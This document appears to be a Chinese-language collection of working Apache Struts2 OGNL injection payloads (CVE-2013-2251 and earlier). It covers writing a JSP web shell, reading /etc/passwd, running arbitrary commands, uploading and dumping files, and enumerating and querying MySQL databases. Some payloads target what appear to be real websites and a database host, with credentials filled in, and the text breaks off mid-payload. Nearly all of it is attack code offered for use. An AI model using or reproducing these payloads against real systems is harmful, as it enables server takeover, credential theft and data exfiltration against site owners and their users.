CVE-2013-2251 当前目录写入test.jsp ?redirect:${ %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'), %23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"), new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close() }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e 读取/etc/passwd ?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 读取当前web路径 ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D ------------------------------------------------------------------------------------------------ 2010版的,其他的版本,在这个基础上修个。欢迎多爆料。 网站物理路径: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) java.版本: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) os.name: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) os.arch ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) os.version ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) user.name ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) user.home 网站物理路径: java.home: \43req.getRealPath(%22\u005c%22) java.version: @java.lang.System@getProperty(%22java.version%22) os.name: @java.lang.System@getProperty(%22os.name%22) os.arch: @java.lang.System@getProperty(%22os.arch%22) os.version: @java.lang.System@getProperty(%22os.version%22) user.name: @java.lang.System@getProperty(%22user.name%22) user.home: /usr/share/jbossas user.dir: /var/lib/jbossas/bin java.class.version: 49.0 java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64 file.separator: / path.separator: : java.vendor: Sun Microsystems Inc. java.vendor.url: http://java.sun.com/ java.vm.specification.version: 1.0 java.vm.specification.vendor: Sun Microsystems Inc. java.vm.specification.name: Java Virtual Machine Specification java.vm.version: 1.5.0_13-b05 java.vm.vendor: Sun Microsystems Inc. java.vm.name: Java HotSpot(TM) 64-Bit Server VM java.specification.version: 1.5 java.specification.vender: java.specification.name: Java Platform API Specification java.io.tmpdir: /tmp 执行CMD ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(h)(('\43webRootzpro\[email protected]@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(h)(('\43webRootzpro\[email protected]@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls+-la http://www.quam.net/index.action?request_locale=zh_TW& ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(h)(('\43webRootzpro\[email protected]@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt 上传文件数据包 ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d)) POST t=neirong&path=%2Ftmp%2Fhsmw.txt 修改POST版加&即可。 ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d)) &t=neirong&path=%2Ftmp%2Fhsmw.txt ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d)) &t=neirong&path=/tmp/hsmw.txt 列目录 返回值(true)判断读取 @java.io.File@listRoots()[0].isDirectory() ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d)) 目录数 @java.io.File@listRoots().length ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('\43xman.getWriter().close()')(d)) 第一个数组 @java.io.File@listRoots()[0]) ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('\43xman.getWriter().close()')(d)) 数组返回值 @java.io.File@listRoots()[0].listFiles().length ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('\43xman.getWriter().close()')(d)) 第一个 @java.io.File@listRoots()[0].listFiles()[0].getName() ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d)) 第2个 @java.io.File@listRoots()[0].listFiles()[1].getName() ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d)) 如何判断文件 返回值(false) @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory() ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d)) 判断文件大小 @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length() ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('\43xman.getWriter().close()')(d)) 输出文件内容 @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]) ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d)) @java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]) ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43req\[email protected]@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d)) —数据库操作— rs.absolute(1) 为第1个数据库 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 rs.absolute(2) 为第2个数据库 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 以此类推,访问数值为空,停止。数据库连接格式比较 &psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 &psw=密码&user=账号&clazz=数据库类型&url=数据库URL(注意URL编码) ------ 数据库(表查询)在原来的语句中,多出一个 &db=数据库名 rs.absolute(1) 为第1个表 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 rs.absolute(2) 为第2个表 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 ------ 数据库(字段查询)在原来的语句中,多出一个 &table=表 rs.absolute(1)为第1个字段 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(1)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 rs.absolute(2)为第2个字段 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(2)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 ----- 数据库(执行SQL语句)在原来的语句中,多出一个 &sql=select+count%28*%29+from+userinfos !这里GET 的数据!POST 木有,怪了。 计算查询的字段数 (例子1) ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 计算查询的字段数 (例子2)返回值8,就是8个字段 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 确定8以后,rs.getMetaData().getColumnName(1) 然后 rs.getMetaData().getColumnName(2) 类推8个字段。 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 输出内容 用rs.next(),第一条内容,是rs.next() ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email 